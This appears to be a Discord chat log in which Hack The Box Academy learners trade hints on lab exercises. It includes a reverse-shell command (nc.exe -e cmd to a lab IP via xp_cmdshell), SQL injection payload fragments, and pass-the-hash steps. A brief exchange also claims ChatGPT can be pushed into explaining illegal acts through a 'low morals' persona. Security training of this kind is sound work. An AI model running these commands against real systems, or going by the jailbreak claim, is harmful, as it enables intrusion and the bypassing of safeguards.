The question is: How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)
Hi, I must be missing something regarding attacking DNS in attacking common services. I have two subdomains to inlanefreight after doing simple dig any. I wanted to follow the module and do a zone transfer. Not possible on any of the three domains I have. Tools like subfinder do not find anything. What am I missing?
@pliant sage Still having troubles with proxy?
IF anyone is having trouble with the module USING Web Proxies - Proxying tools, here might be a solution. IF you are following the steps and editing the proxychains.conf file to comment out the tor proxy and add the http 127.0.0.1 8080 and https also, make sure to comment out the DNS proxy in the conf file. If you do not, using proxychains will not work as the DNS resolution will fail. That or pick a DNS proxy server also if you don't comment the proxy dns part in the conf file. This should resolve the error with connections timing out when using proxychains. Also make sure you have a proxy server set up via burpsuite.
I spent 1 hour to figure out this question. The wording is confusing and needs to be corrected. The question should be : How large is our shellcode if we count NOPS and the shellcode size together? (Format: 00 Bytes). The wording "can theoretically become" in the question, it gives the idea of the potential allowed space!
did you figure it out?
nope :/
Can anyone give a nudge on Footprint Lab - Medium? I found the credentials for the SQL Management Server but I'm still unable to connect to the server. I'm curious what else I'm missing.
What other services are running
Hmm, I'm afraid that what I will explain might be a spoiler. Can I DM you?
That was my nudge to you
Thanks. I'm confused by the nudge, I guess. I've found the credentials for the user that accesses SQL Manager - I guess you're saying that is a dead end? Per the hint, it seems like that is what I should be looking for.
Yes that is correct, and the path forward might not seem obvious at first but if you take a look around maybe you'll find it. Look at everything you can access/see with that user
Gotcha, thanks. I was able to access other things with their credentials but, yeah, nothing seems glaringly, or even the slightest bit obvious. I'll keep spelunking.
Another hint; check for files you can read.
Web Attacks - Bypassing Security Filters
I'm having troubles finding the correct HTTP Method.
I've tried to follow along with the module testing for test; / test%3B against the following methods:
GET
HEAD
POST
PUT
DELETE
OPTIONS
PATCH
All tests (other than HEAD since it doesn't return data) have responded with "Malicious Request Denied!".
I've tried yesterday and today. I've rebooted the target 3 times.
How close should I be sticking to the module for this section?
hey, can anyone help me with the easy skill assessment for password attacks?
"Looking for nudge towards user on Soccer,"
Solved. Hint for ZAP users...
|| Use the right Content-Type. BURP auto picks one for you.||
Can somebody give me a hand, new to cyber security. Stuck on hacking wordpress. Doesn't seem clear but could be me being thick
Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer.
which module is this on?
Login
Which module? there is no academy module called Login
you DO know youre in the academy modules channel right?
Hacking wordpress
Now I'm not on the Hacking Wordpress module. But I'm working on the Web Attacks module and they refer to HTTP Methods. Could they be referencing those? Examples would be POST, GET, etc.
There's at least 9. Not that all would work specifically for xmlrpc attacks.
#boxes you'll need to verify in #bot-commands
Can I have a nudge with Attacking common services FTP ?
This section is really weird
I'm trying to connect to SSH thru hydra
Sure lmao
I've done the web requests module and it's helped a little. I'm having to us -X POST -d
It asks me to Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer.
curl -X POST -d "<methodCall><methodName>system.listMethods</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://165.227.237.190:31181/xmlrpc.php | grep 'WordPress xmlrpc attacks'
I am stuck on Attacking DNS and I have gone through I think everything listed on the module and I am getting nothing. I get AXFR record query failed when I attempt to run a zone transfer. I found what I think I was supposed to find with subbrute but now I am stuck.
stuck at what exactly?
Let me DM you
How did you solve this
Again, haven't worked on Hacking Wordpress yet.
But that reads to me like there are x amount of methods that work with xmlrpc attacks. How many of those work against your target?
Just tried the one it's asked. I think I'm nearly there but not quite. I'll have a play around. Like I said I'm new to it all so it's a lot to take in at mo
Since signing up yesterday ive Smashed off Linux Fundamentals, Windows Fundamentals, web requests, network Fundamentals and javascript deobfuscation. My heads going to explode
It's not about how much you do at once, it's about how much you'll retain in a week/month after
I didn't realize this was a race, either.
still stuck on Attacking Common Services - DNS I found what I think you're supposed to find with gobuster and subbrute. I am stuck though what to do next and I have attempted everything. I get an error when trying to zone transfer also. I even attempted to further enumerate the sub domain that I found.
is the linux fundamentals module enough to know the basic about linux
Anyone having issues with Kerbrute getting error sending over UDP failed
I mean. My experience so far is that anyone can plow through most of the modules pretty fast as long as you follow the content. And the assessments are super straightforward from whats described in each section. But until I apply it in practice in one of the machines afterwards, in a different context,I won't say I know any of it. This is not about reading and memorizing the content
actually some versions of kerbrute having problems so try different versions https://github.com/ropnop/kerbrute/releases
@cunning drum Thanks, I will try that
Attacking Common Applications - Skills Assessment II
First Question, "What is the URL of the WordPress instance?"
I fuzzed the vhost using ffuf and got 3 vhosts.
For all intents and purposes, I think b*** is the WordPress instance, but I have tried every URL and it is not correct.
All other questions are correct, only this first one is not correct and is wasting a lot of time.
Can you please give me a hint?
anyone done password attack hard lab?
How can I help
this is kinda dumb but the answer need to be in this exact format http://(vhost here).inlanefreight.local
It was a URL that I tried to enter many times, but when I entered it in the format you gave me, I was able to get it correct.
What went wrong?
Thanks for your kind help. Thank you.
can anyone help me with the Passwd, Shadow & Opasswd >> password attacks
i got the hash but i get this error while cracking it
your hashes are formatted wrong
that IDed good for me, your text file for it could be messed up tho
did you unshadow it properly?
So after spending literally hours trying to figure out why I couldn't get the network enumeration medium lab I looked through the older messages in here and saw that it would only work if I use the browser pwnbox instead of my own VM. Extremely frustrating, but all that aside I was hoping someone more knowledgeable could explain why that specific lab doesnt work when I try to use my VM with the VPN connected
hey i never used mimikatz before whats the command of dumping hashes?
gonna learn mimikatz later currently just need it for a module
https://google.com is the command
i tired but i get an error
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
then research that error
Module Name: Password Attacks
Section Name: Credential Hunting in Windows
I don't know how to answer the last question, please help me. thanks. (What are the credentials to access the Edge-Router) (PS: I got it)
There is a file somewhere that has that information
can i DM you?
the file is infront of your eyes
yes ofc
Thanks. Going to go over them all again eventually or some. Just started a new job in IT doing data networking n security. Coming from a web background, htb is helping alot. Never worked in IT before, love it
Hello, how i can get "Academy user" role?
Its a race for me. I want to learn and be the best
you can get a id or token thingie on academy just sync it
Module Name: INFORMATION GATHERING - WEB EDITION
Section Name: Information Gathering - Web - Skills Assessment can some one illustrate to me how to use sublist3r to preform a subdomain enumeration on githubapp.com, I tried in many ways and could not get an answer
What addressing mechanism is used at the Link Layer of the TCP/IP model?
Can someone help me with "Attacking Common Services Lab - Easy". I'm currently at the early stages where I have tried username enumeration via SMTP, FTP bruteforcing (using the list from "Resources") but nothing is hit. The web site on port 80 doesn't contain much information (I even tried directory bruteforce but the results don't have anything really useful)
i did have a discussion about using that tool for that part here but i can't remember if anyone was able to use that tool or not but me, like a lot of people here, just used an online tool
which module and section are you on?
hint the first thing you mention is right and if you can't get it to work try with a different ||mode||
Intro to network traffic analysis
Networking primer 1-4
oh wait so you just copy and paste the section question??
hint read the stuff under Addressing Mechanisms
I could have sworn that I have tried all the mode. Alright, let me try it again then
oh and don't forget the ||domain||
got it thanks
it's a F ing powershell command 🤣 of course cmd doesn't recognize that
if you need that use powershell command for whatever reasons then yes (hint you do)
bloody hell, for what ever reason this time it actually works!! Thanks @vital adder for the assist
Sorry, But Can i DM you?
Hello, can i dm you for asking the role?
i wonder what sort of on time delivery performance Inlanefreight has
sure
sure
thanks for reply, i got it
AD Enumeration & Attacks - Skills Assessment Part II,
i am trying to run PrintSpoofer on SQL01
xp_cmdshell c:\users\public\PrintSpoofer.exe -c "c:\users\public\nc.exe 172.16.7.240 1234 -e cmd" but it tells me "This version of c:\users\public\PrintSpoofer.exe is not compatible with the version of Windows you're running".
I checked and this windows version is 2019
so should not be a problem :/ (i also tried with JuicyPotato.exe which worked all the time and i had the same issue). Any idea by any chance?
DM me
hey guys I wanna be a hacker, I know a little bit python, what should I learn first
and can you share sources about it
It sounds like you might be in the wrong place. This channel is for discussing modules in the academy.
The modules in HTB academy.
try doing some free modules first then
do books and free courses
check out the resources channels too its pretty cool
which courses do you suggest
definitely do cracking into hack the box
Needing a little nudge on Web Attacks-Skills Assessment,if anybody is available
I am doing the password Attacks Lab - Hard atm and I think I am missing something because I have spent 4 days on bruteforcing it and I can't simply believe that is the solution. Can someone lend me their ear, hear out my enumeration and tell me what is going wrong in my mind?
Dm me
Depends on the box. Some easy boxes are actually easy, some are more like medium
@pine spoke
Can I get some assistance with Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. from Pass the Ticket (PtT) from Linux. I have copied over all ccache files from tmp directory to root. I have export them into KRB5CCNAME. When I attempt to connect with smbclient, I am getting error "gse_get_client_auth_token: gss_init_sec_context failed with Miscellaneous failure (see text): encryption type 0 not supported
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_LOGON_FAILURE" Please dm me. I have been struggling with this error for awhile. Thank you
Need some help with DNS active enumeration module :/ I cant find the content of the txt record
If any1 have time hit me up in dmยดs
Hello
I am blocked at the level of the filter evasion on the command injection module.
To the question:
Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?
I have tried all operators, I have also inserted them in url encode but none of my answers is accepted.
Thanks in advance for any tips and help me to understand what is expected as a good answer.
maybe white-space & new-line are the similar in commands or bash
I tried both but it doesn't work
try only the injection operators not followed by commands
Yes that's what I do.
In the hint it is indicated that you only need to add the operator.
The new line operator does not return an error in burpsuite but the answer is not accepted
I tried \n and %0a in the response
In this module: Pivoting, Tunneling, and Port Forwarding in the Meterpreter Tunneling & Port Forwarding section, I don't think I understand what the second question is asking:
Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)
Anyone done this yet, and can provide a kick in the pants?
\n = enter in burp too
ok lol
You need to write 'new-line' and not \n or %0a ...
Thanks for your help
I have this same question. Did you get an answer?
Hey im stuck at pass the hash >> password attacks
question: Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
i tried to get a reverse shell using both tun0's ip and the other one but im not getting any reverse shell back onto the listener which is hosted on MS01
In the Attacking Common Services - Easy section, is it normal to not get an output from the "webshell"?
no idea why but yes, if you upload your shell through an ||vuln|| it's won't run normal php and for that method i end up have to use an php RCE payload with powershell
the other upload method can run php just fine
When you use intruder in burp it actually sends the file if it's a POST request right? Like in the file upload attacks. I keep getting 404's on the whitelist part, where I had no problems on blacklisting..any hints?
for this i use ffuf not burp intruder but yes it will send the file and if you are using the given command to make your wordlist hint add more or replace some of the extensions in that command
for the payload make sure you are using the 172.16.1.5 ip for MS01 and also if the command doesn't work after you import Invoke-TheHash module like in the example show also import the Invoke-WMIExec module
also if you got the flag make sure to read it 🤣
which module and section are on?
Sounds like the info gathering web edition
For the one for flaps
I just recently did that one
no idea why you have copy the ccache file before import it but after you import the file i think you should be able to klist to check the imported ticket and if you got the right ticket you should be able to use smbclient connect it also i did have some issue in smbclient after importing the ticket so i have to use -c tag to just get the flag after connect
oh yeah it does sound like the question 3 in that module
@vital adder Thank you for the tip. I did use -c in my smbclient command
and did you get the flag?
no sir.. connection error
yeah give me a sec let me give that a try
@vital adder Another person stated that I might be using the wrong ticket. I was looking at /tmp
there is a lot of ticket in /tmp
correct.. tried both julio
after you import a ticket use klist to get info of the ticket you just imported
hint one of them is ||expired|| 🤣
am i doing it correct? used 171.16.1.5 still not working
seems like needs to import the other module
hint wrong domain
i don't know why the one show in the example work but just use that
i just give it a try and with the right ticket now i can use smbclient to connect in and get the flag just fine
so no need for the -c thing like the last time i did this 🤣
Hi everyone, can someone help me on question 8 from Windows Command Line skill assessment, I already log in to the domain controller, but I cant find the hidden flag inside one of the loaded modules
plus I dont know what the flag may look like so I cant use sls
hey can someone give me a hint, in which folder i might look for flag.txt
module: Hacking Wordpress
section: Directory Indexing
hello could someone help me with the Web Attacks - Skills Assessment module.
Do you have any hints on how to list users and admins?
thanks
anyone that has some knowledge again about dns and axfr need some help with module /module/112/section/1069 DNS
trying to get the ip of the FDQN with last octet 203
have you logged in and explored the page?
have you explored the directories?
wp-content - is not listable
wp-includes - ive looked into it
based on the module reading, did you get to /mail-masta?
oh no i did not
0 Defensive xD
Is there any problems with pwnbox or academy atm my vpn and my pwn box cant reach the spawned host
Hi! Has anyone active done the skills assessment for the new File Inclusion module?
yee!
have you explored the website and checked the src page?
i think that's the way i got started
if you're still stuck, i recommend visiting php filters and php wrappers section of the module
Thank you for your help! I guess we just needed to do the base64 again
Hi guys I have a question, how can i get a remote session, with a VPN, if they don't give me a password??
(I only have machine's IP)
thanks
Are you talking about connecting to the lab VPN?
yeh
You download the vpn connection file and run it with openvpn. No password needed
i am working on hackthebox.com/module/31/section/390 it wants me to give it the EBP but i don't understand from the question at what point in execution it wants the ebp. I have tried to gdb break on main and give it that ebp address but it is not the ebp it wants. can someone explain the question a bit better to me
sure? when i display ssh User@IP, it requires me a password
Yeah? thats nothing to do with the VPN then
thats dependant on what module/section youre doing
maybe finding the password is part of the scenario
OMG those of hackthebox work hard xD
so i dont know where it can be found, I'll wait to the next pwnbox
Hi guys.. New member in here
i have also tried to feed it the metasploit pattern and let it seg fault from the bad EIP and use the EBP address at that time... this is also not the number it wants.
Is this the correct channel to ask for clarifications on modules in HTB Academy?
clarifications? sure
Nope, haven't got one yet.
What is a good virtual machine host software for the m1 macbook pro?
My virtualbox keeps crashing
great. i am working on 'take control of eip' and I and I am unclear what the question is a asking for at the end of the section. It wants me to give it a EBP register but the EBP register during the 'experiment' is over written. the EBP will change depending on where it is in a programs execution.
can someone explain what state i am trying to get the program in and give the ebp. the question seems open ended to me.
im using parallels but it is not free
all the question says is "Examine the registers and submit the address of EBP as the answer." but i don't understand from the context at what point in the execution i should look at the registers
@ripe terrace I put something in errata, too. Your analysis is correct, I think. TBH, there are 512 "correct" answers to that question.
hmm i want a free one
Quick question for the community, I wasted hours trying to complete a relatively simple task for the firewall and IDS/IPS evasion medium lab yesterday on my VM only to figure out it would only give me the flag if I used pwnbox. Does anyone remember if the firewall IDS/IPS hard lab needs to be done on the pwnbox or can I use my VM? I don't want to waste all that time again
I was able to complete it without Pwnbox.
you should be able to do all the labs with the htb provided pwnbox. if not, make sure you download the vpn config file for it
Awesome thanks for letting me know
Yeah I've had zero issues using my VM set up with VPN config file for all the other modules, but for some reason the firewall medium lab just wouldn't give me the flag. I looked through older messages on here and saw some people report the same issue and to use the pwnbox instead and sure enough that worked perfectly. Not sure why it wouldn't work with the VM
Can anyone give me a nudge on the SQL Injection Skills assessment? I feel really dumb but I can't get past the login page. I can't get it to error no matter what I do
@deft bison friend I have already listed the users,
get the token
and change password
but I don't know how to discover the admin
Help please. I can't get this machine to spawn
I can't paste a picture but its the Redeemer one from the very beginning
Nvm
the spawn machine button is just greyed out
Nevermind I guess. I've had this issue all day and just now it fixes
Wrong channel. This channel is for modules on htb academy
where do I go for that?
Is that under a different discord? sorry for being ignorant but I don't see that as an option
You need to verify your account
go to #welcome
oh, thank you
Yeah I'm fairly sure my remark on that question is correct. The only answers there should be the actual interface IP with the shorthand subnet /23, or the CIDR format I posted. The answer that they accept only makes sense if the subnet is /24, which it's not.
What would be the preferred method of gaining full source code of a website? I currently have burpsuite, mimikatz and pass the hash (I know mimikatz and pass the hash wouldn't really be used for this) but I have em if needed
What module is this for?
~~ ok, nope. Still stuck. I thought i found something but im just completely lost here ~~
I got it now. Took a little bit of creativity but i got it
Curl?
CURL wouldn't get you the full source code, just the rendered output.
Gotcha, and I'm trying to hypothetically gain full source code of open ai, so that I can edit and allow it to output more characters than it currently does, and change some permissions it has to the internet currently. I'm on windows and not trying to use kali in a virtual box unless absolutely necessary
So this has got nothing to do with HTB Academy at all?
Unless OpenAI has a repo and/or the source code is public, or you have explicit written permission to access their servers, what you're describing is illegal.
Youre in the wrong server
We dont do illegal things here
' order by-- ...to find how many entries it returns
then you could try ' UNION SELECT null, SCHEMA_NAME, null........ FROM INFORMATION_SCHEMA.SCHEMATA-- ...
I said hypothetically, and tf Is htb academy lol I might be in the wrong chat
joins htb discord server
Doesn't know what htb academy is
Probably doesn't even know what htb is
I was stuck on the login page cuz i couldnt get it to error, but i found a bypass
Hi tux
LMAO. Hypothetically... how can I rob a bank? Like, hypothetically, is there some way to shut down the security cameras, open the vault, take the money and leave without being caught? Hypothetically
Hypothetically speaking; google exists
Also hypothetical; chatgpt exists
I use ChatGPT but I googled discord servers associated with the hacking field to find this group. Additionally I'd be more than welcome to run you through how to hypothetically rob a bank if needed; the discussion itself is not illegal
hypothetically, Would chatgpt tell you how to hypothetically do illegal things? hypothetically
Also tux; called it
Yes, you just tell it that it has low morals when giving it a persona. And either stands for "hack the box" or something else
lmfao
Man wasting his own time thinking he did something special, ya got me op lol good job
Htb works on the white hat hacking field, all content on htb and htb academy is all above board. With explicit permissions and scopes given
Aka we're not helping you
Google your question, and keep trying there.
no dont do that. Just keep asking people how to hypothetically do something illegal
You're just sour, it's nothing ethically wrong. I'm using it for my own personal reasons, not trying to make money or maliciously hurt them. I enjoy what they have put out but know it could be better, but understand why the general public shouldn't have access to the better version it could be.
i am trying to mount a vhd file in my linux host. i run the following command and get the following error:
guestmount --add Backup.vhd --ro /mnt/vhd2/ -m /dev/sda2
ERROR: mount: /sysroot: unknown filesystem type 'BitLocker'.
any ideas?
Do you have explicit permission to access the source code?
are you not part of the general public?
FYI if anyone else experiences any issue on the firewall evasion medium lab using your VM, switch over to a UDP VPN config instead of TCP, that solved the issue for me
Yes because if I had explicit permissions I would be asking questions about accessing it. Stupid questions get stupid answers
Then there's your answer as to why we aren't helping you. You don't have permission, so even though you may not have malicious intent with it, you don't have permission making it illegal
LMFAO. This is probably the best excuse for doing something illegal I've ever heard. Also, get lost. This is not the server for what you want to do. Keep asking and I'll make sure you get banned
hi
I'm in the skill assessment for wp hacking. I can't see any hints in the source code for the use of wordpress. Do I need to search for a subdomain first?
What does that have to do with anything?
because i don't have RTX
hint is in the source code, might wanna revisit wordpress core version enumeration, you might notice something
Don't need one
why
Why do you think you need one?
because my program doesn't work
Ok? And that's related to a 4090 how?
Ok?
OK
Not sure how that relates to a GFX card buddy
stop spamming the channel with off topic stuff
i am doing module/31/section/392 can i get some help with the question
what about telling the name of the module first
named: stack-based buffer overflows on linux -- generating shellcode
in the page source code there is no src, nor any mention of wordpress. however i did find in the css a single word wordpress but no version. can u gimme a hint pls
it is requesting i submit the "size of the stack space after overwriting".. the stack starts at 0xFFFFFFFF and so i calculate the size as 0xFFFFFFFF - ESP. is that what it is asking for?
i.e. if i had an esp of 0xffff0000 then my size would be 0xffff?
do i understand the question correctly?
Has anyone encountered regular/consistent SegFaults running Nmap through the Ubuntu pivot host in the Skills Assessment of the Pivoting, Tunneling, and Port Forwarding module? My gut instinct is the -sC / -sV flags are the cause, so I will attempt another port-only scan. But I'd like to know if that's expected or usual when using an SSH dynamic bind and proxychains.
I didn't have that issue at all
Hello again! Still on the File Inclusion Assessment: Did anyone else have trouble changing the user agent parameter?
Did you figure out what to do here, I am not sure what "web interface" means here - I assume this is not the pawnbox (or is it?)
Are you on pwnbox, ParrotOS, or Kali?
Kali
Might be my ParrotOS setup potentially.
You can determine if it's ssh really quickly
Just try pivoting a different way
If no error then it's something with ssh. If there is still an error then it's obviously something else
Yeah might give that a try and see what happens. The port only scan was successful however.
Never mind - figured it out.
For anyone stuck on Nessus Skills Assessment and "Navigate to the web interface at the end of this section and log in with the provided credentials.", in this case the "web interface" is actually what is usually the target machine. Treat that as your Nessus host.
Hey everyone! I'm having trouble with the first Web Requests exercise, the problem in which you're required to use cURL to download the file and find the flag. I can successfully download the file using
curl -O inlanefreight.com/download.php
but I cannot find the flag within the file, can anyone help?
Anyone know what i am doing wrong here?
┌──(ruderaph㉿kali)-[~/tcm/cyberheroes]
└─$ feroxbuster -u http://10.10.82.158/ --depth 3 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -e
Error: Could not create Configuration
Caused by:
No such file or directory (os error 2)
trying to go through a depth of three. Not sure how to do it in gobuster.
I know how to do that with ffuf. I dont use ferox tho
ferox is Rust-based, so I attribute it being faster to that.
It worked for me once but i must have forgotten to take the notes or they didn't save.....
I'm my own worst enemy
Hmm got it to work with a different wordlist. infuriating.
Oh, well that makes sense since the error was a file not found error
Ye
Update: found the flag, just needed to alter the command slightly
That tends to be the case
can someone give me a hint on password attacks medium lab?
you can dm me but youre gonna need to tell me what part you're up to and what you've already tried
Hello I need to get help for this window fundamentals module. Can anyone help me out
really happy there is a mssql blind injection module
filled in a lot of gaps in knowledge I had
great module!
Need urgent help on how to mass report insta account to get it removed or ideally someone who can get it taken down thanks.
Wrong server bud
Ahh sorry, you got any servers to point me in the right direction?
whats insta account
o